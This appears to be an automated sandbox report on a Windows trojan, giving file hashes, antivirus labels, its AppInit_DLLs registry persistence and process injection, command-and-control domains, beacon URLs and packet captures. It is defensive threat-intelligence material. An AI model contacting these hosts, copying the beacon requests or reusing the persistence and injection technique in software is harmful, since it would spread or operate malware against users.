Analysis Date: 2014-11-12 18:59:05
MD5: 0d4f8aa66ddeb2f00c55b4d9dad091e6
SHA1: 596a73426a844b6c1de2978a7c3ece0efacd5bc0

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 7c0eab503cb4dffa67d3689ec609d3a3 sha1: c7a4f222594573a280be687b710b5e012f64ebff size: 54784
Section .data: md5: c37a4dd6e7451fc9eaf27dc929eeab36 sha1: d90b4de0b2c1f1494ddda0f92aa503bfb141ba16 size: 69632
Timestamp: 2012-09-19 09:26:48
Pdb path: C:\Install\Release\exe.pdb
Packer: Microsoft Visual C++ ?.?
PEhash: cec3f3d5caccb0805c169b50b0fe0314d48f986f
IMPhash: bfa0d41624e02f4195f26b63cb067948
AV 360 Safe: Gen:Trojan.Heur.JP.hiW@aesMXwfi
AV Ad-Aware: Gen:Trojan.Heur.JP.hiW@aesMXwfi
AV Alwil (avast): Trojan-gen:Win32:Trojan-gen
AV Arcabit (arcavir): no_virus
AV Authentium: no_virus
AV Avira (antivir): TR/Dldr.Vundo.J.69
AV BullGuard: Gen:Trojan.Heur.JP.hiW@aesMXwfi
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Trojan.Cidox.r2
AV ClamAV: no_virus
AV Dr. Web: Trojan.Mayachok.17789
AV Emsisoft: Gen:Trojan.Heur.JP.hiW@aesMXwfi
AV Eset (nod32): Win32/Citirevo.AD
AV Fortinet: W32/Citirevo.ADI!tr
AV Frisk (f-prot): no_virus
AV F-Secure: Gen:Trojan.Heur.JP.hiW@aesMXwfi
AV Grisoft (avg): Downloader.Generic13.FLQ.dropper
AV Ikarus: Trojan.Win32.Cidox
AV K7: Riskware ( 0040eff71 )
AV Kaspersky: Trojan.Win32.Cidox.amfo
AV MalwareBytes: no_virus
AV Mcafee: no_virus
AV Microsoft Security Essentials: TrojanDownloader:Win32/Vundo.J
AV MicroWorld (escan): Gen:Trojan.Heur.JP.hiW@aesMXwfi
AV Norman: Gen:Trojan.Heur.JP.hiW@aesMXwfi
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: Trojan.Gen
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\system32\mhwnphe.dll
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS: 91.233.89.106
Winsock DNS: clickbeta.ru
Winsock DNS: denadb.com
Winsock DNS: terrans.su
Winsock DNS: nsknock.com
Winsock DNS: tryatdns.com
Winsock DNS: clickclans.ru
Winsock DNS: denareclick.com
Winsock DNS: fescheck.com
Winsock DNS: instrango.com
Winsock DNS: flersomstk.com
Winsock DNS: tegimode.com
Winsock DNS: netrovad.com
Winsock DNS: nshouse1.com
Winsock DNS: foradns.com
Winsock DNS: getavodes.com
Winsock DNS: clickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\mhwnphe.dll\\x00

Network Details:

DNS getavodes.com: Type A, 141.8.225.80
DNS tryatdns.com: Type A, 209.222.14.3
DNS fescheck.com: Type A, 209.222.14.3
DNS instrango.com: Type A, 209.222.14.3
DNS denadb.com: Type A, 204.11.56.26
DNS foradns.com: Type A, 141.8.225.62
DNS flersomstk.com: Type A
DNS netrovad.com: Type A
DNS nsknock.com: Type A
DNS terrans.su: Type A
DNS tegimode.com: Type A
DNS clickstano.com: Type A
DNS denareclick.com: Type A
DNS clickbeta.ru: Type A
DNS nshouse1.com: Type A
DNS clickclans.ru: Type A
HTTP GET: http://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1445&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg6dmve9oLBal2bzc3XW25gJrBThdNyzvm841tYaAoySz
User-Agent:
HTTP GET: http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1445&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg6dmve9oLBal2bzc3XW25gJrBThdNyzvm9+GK9hHwJNZ
User-Agent:
HTTP GET: http://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1445&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg6dmve9oLBal2bzc3XW25gJrBThdNyzvm1/oZuteS4ZE
User-Agent:
HTTP GET: http://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1445&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg6dmve9oLBal2bzc3XW25gJrBThdNyzvm05E/mZKwST6
User-Agent:
HTTP GET: http://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1445&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg6dmve9oLBal2bzc3XW25gJrBThdNyzvm7aj8fQOK00U
User-Agent:
HTTP GET: http://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1445&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg6dmve9oLBal2bzc3XW25gJrBThdNyzvm8EqEHt5JLD2
User-Agent:
HTTP GET: http://91.233.89.106/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1445&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg6dmve9oLBal2bzc3XW25gJrBThdNyzvm4/pWEmcyicG
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1032 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1033 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1034 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1035 ➝ 204.11.56.26:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.62:80
Flows TCP: 192.168.1.1:1037 ➝ 91.233.89.106:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34343526   XX0000&key=1445&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796736 646d7665 396f4c42 616c3262   Wyg6dmve9oLBal2b
0x000000b0 (00176)   7a633358 57323567 4a724254 68644e79   zc3XW25gJrBThdNy
0x000000c0 (00192)   7a766d38 34317459 61416f79 537a2048   zvm841tYaAoySz H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2067   TTP/1.1..Host: g
0x000000e0 (00224)   65746176 6f646573 2e636f6d 0d0a0d0a   etavodes.com....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34343526   XX0000&key=1445&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796736 646d7665 396f4c42 616c3262   Wyg6dmve9oLBal2b
0x000000b0 (00176)   7a633358 57323567 4a724254 68644e79   zc3XW25gJrBThdNy
0x000000c0 (00192)   7a766d39 2b474b39 6848774a 4e5a2048   zvm9+GK9hHwJNZ H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2074   TTP/1.1..Host: t
0x000000e0 (00224)   72796174 646e732e 636f6d0d 0a0d0a0a   ryatdns.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34343526   XX0000&key=1445&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796736 646d7665 396f4c42 616c3262   Wyg6dmve9oLBal2b
0x000000b0 (00176)   7a633358 57323567 4a724254 68644e79   zc3XW25gJrBThdNy
0x000000c0 (00192)   7a766d31 2f6f5a75 74655334 5a452048   zvm1/oZuteS4ZE H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   65736368 65636b2e 636f6d0d 0a0d0a0a   escheck.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34343526   XX0000&key=1445&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796736 646d7665 396f4c42 616c3262   Wyg6dmve9oLBal2b
0x000000b0 (00176)   7a633358 57323567 4a724254 68644e79   zc3XW25gJrBThdNy
0x000000c0 (00192)   7a766d30 35452f6d 5a4b7753 54362048   zvm05E/mZKwST6 H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2069   TTP/1.1..Host: i
0x000000e0 (00224)   6e737472 616e676f 2e636f6d 0d0a0d0a   nstrango.com....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34343526   XX0000&key=1445&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796736 646d7665 396f4c42 616c3262   Wyg6dmve9oLBal2b
0x000000b0 (00176)   7a633358 57323567 4a724254 68644e79   zc3XW25gJrBThdNy
0x000000c0 (00192)   7a766d37 616a3866 514f4b30 30552048   zvm7aj8fQOK00U H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2064   TTP/1.1..Host: d
0x000000e0 (00224)   656e6164 622e636f 6d0d0a0d 0a0a0d0a   enadb.com.......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34343526   XX0000&key=1445&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796736 646d7665 396f4c42 616c3262   Wyg6dmve9oLBal2b
0x000000b0 (00176)   7a633358 57323567 4a724254 68644e79   zc3XW25gJrBThdNy
0x000000c0 (00192)   7a766d38 45714548 74354a4c 44322048   zvm8EqEHt5JLD2 H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   6f726164 6e732e63 6f6d0d0a 0d0a0d0a   oradns.com......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34343526   XX0000&key=1445&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796736 646d7665 396f4c42 616c3262   Wyg6dmve9oLBal2b
0x000000b0 (00176)   7a633358 57323567 4a724254 68644e79   zc3XW25gJrBThdNy
0x000000c0 (00192)   7a766d34 2f705745 6d637969 63472048   zvm4/pWEmcyicG H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2039   TTP/1.1..Host: 9
0x000000e0 (00224)   312e3233 332e3839 2e313036 0d0a0d0a   1.233.89.106....
0x000000f0 (00240)                                         


Strings
.CC.
 
\S
.
.
\0105.tmp
- abort() has been called
April
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
CONOUT$
- CRT not initialized
dddd, MMMM dd, yyyy
December
DOMAIN error
erunas
explorer.exe
February
- floating point support not loaded
Friday
                                 H
         (((((                  H
         h((((                  H
HH:mm:ss
\Iterra
January
jjjjjj
July
June
KERNEL32.DLL
March
@Microsoft Visual C++ Runtime Library
MM/dd/yy
Monday
mscoree.dll
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
October
Program: 
<program name unknown>
- pure virtual function call
R6002
R6008
R6009
R6010
R6016
R6017
R6018
R6019
R6024
R6025
R6026
R6027
R6028
R6030
R6031
R6032
R6033
\regedit.exe
\regedt32.exe
runtime error 
Runtime Error!
/s "
Saturday
September
Service Pack 
shell32.dll
SING error
Sunday
\T03emp03.reg
tElevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
Thursday
TLOSS error
Tuesday
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Wednesday
Wole32.dll
WUSER32.DLL
                          
\0105.tmp
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
1C#nQ.L
1|H`14
>}~2+)zH
^3b6iVWZ
3}Fx%y
/<3T-6{
5	?$pI
7|k;174
#;@:-8$A
"8|yx)}K `2
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
\AddIterra
AdjustTokenPrivileges
ADVAPI32.dll
AllocateAndInitializeSid
"AppInit_DLLs"="
AppInit_DLLs
<at,<rt"<wt
August
*a Xp$
b$6*u]
BD$L|-
########c:\
CheckTokenMembership
c#Hj~]
C:\Install\Release\exe.pdb
CloseHandle
CoGetObject
CoInitializeEx
CopyFileW
CorExitProcess
CoUninitialize
CreateDirectoryA
CreateDirectoryW
CreateFileA
CreateFileW
CreateRemoteThread
CreateToolhelp32Snapshot
`.data
dddd, MMMM dd, yyyy
December
DecodePointer
DeleteCriticalSection
DeleteFileA
DeleteFileW
e(=JO]
EncodePointer
EnterCriticalSection
e\)>SL
ExitProcess
ey|\!G
February
(f.\F'
fIb<_d2
flash_player_update.exe
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
FreeEnvironmentStringsW
FreeLibrary
FreeSid
Friday
FXZ,E't
GetACP
GetActiveWindow
GetCommandLineA
GetCommandLineW
GetConsoleCP
GetConsoleMode
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStringsW
GetExitCodeThread
GetFileType
GetLastActivePopup
GetLastError
GetModuleFileNameW
GetModuleHandleW
GetNativeSystemInfo
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoW
GetStdHandle
GetStringTypeW
GetSystemDirectoryA
GetSystemDirectoryW
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationW
GetVersionExW
GetWindowsDirectoryW
 gP"9A
hE7Z5^
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSetInformation
HeapSize
HH:mm:ss
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
HL=:G[
!)'I]8uQ
i< b8#
Ie=Np2`K
_InfoKey
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
(iRz8N
IsDebuggerPresent
IsProcessorFeaturePresent
IsValidCodePage
\Iterra
@iWXvirZ
(J(]=?
January
j@j ^V
JO{"7R]
\JY9lPg
KERNEL32.dll
.}k L;o
LCMapStringW
LeaveCriticalSection
"LoadAppInit_DLLs"=dword:00000001
LoadLibraryA
LoadLibraryW
LookupPrivilegeValueA
lstrcmpiA
lstrcmpiW
lstrlenA
lTsg F
<m1iDeV
MessageBoxW
<M](#m
MM/dd/yy
Monday
mO!sYID
MultiByteToWideChar
M&v}	d
November
n:/u?P
October
Od`<WJ
OpenProcess
OpenProcessToken
PPPPPPPP
Process32FirstW
Process32NextW
PuEi) 
q7Xb$@S
(q%[b$f
QQSVWh
QueryPerformanceCounter
ReadFile
RegCloseKey
regedit.exe
regedt32.exe
RegOpenKeyExA
RegQueryValueExA
RemoveDirectoryW
r( %GpN
RSDSm$
RtlUnwind
rvo*>lX
	?RW&H
Saturday
SeDebugPrivilege
September
SetEndOfFile
SetFilePointer
SetHandleCount
SetLastError
SetStdHandle
SetUnhandledExceptionFilter
SHCreateItemFromParsingName
SHELL32.dll
ShellExecuteExA
ShellExecuteExW
SHGetFolderPathA
SHGetFolderPathW
SHLWAPI.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
^SSSSS
StrStrIW
Sunday
S)W!A"
\T03emp03.reg
\T04emp04.reg
t7{>10
tCHt(Ht 
TerminateProcess
!This program cannot be run in DOS mode.
Thursday
ti--La
t	j\Yf
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
t"SS9] u
!T!sV?
Tuesday
;t$,v-
U1T0_!
u1vw1T
uBTUa$5
u}ht!@
u)jAXf;
um#3k/
UnhandledExceptionFilter
UNICODE
UQPXY]Y[
UrAe ?
URPQQh
UTF-16LE
vfoI^2r5
V_?~Ho
VirtualAllocEx
v	N+D$
VpSr^R
W9V.7&
WaitForSingleObject
W&bD!{
Wednesday
WideCharToMultiByte
Windows Registry Editor Version 5.00
WriteConsoleW
WriteFile
WriteProcessMemory
X1wy_&G
x7oO4A
x8?=QX
ZGR+mYNo{
z}:%l&
z\(x}B
z |y2N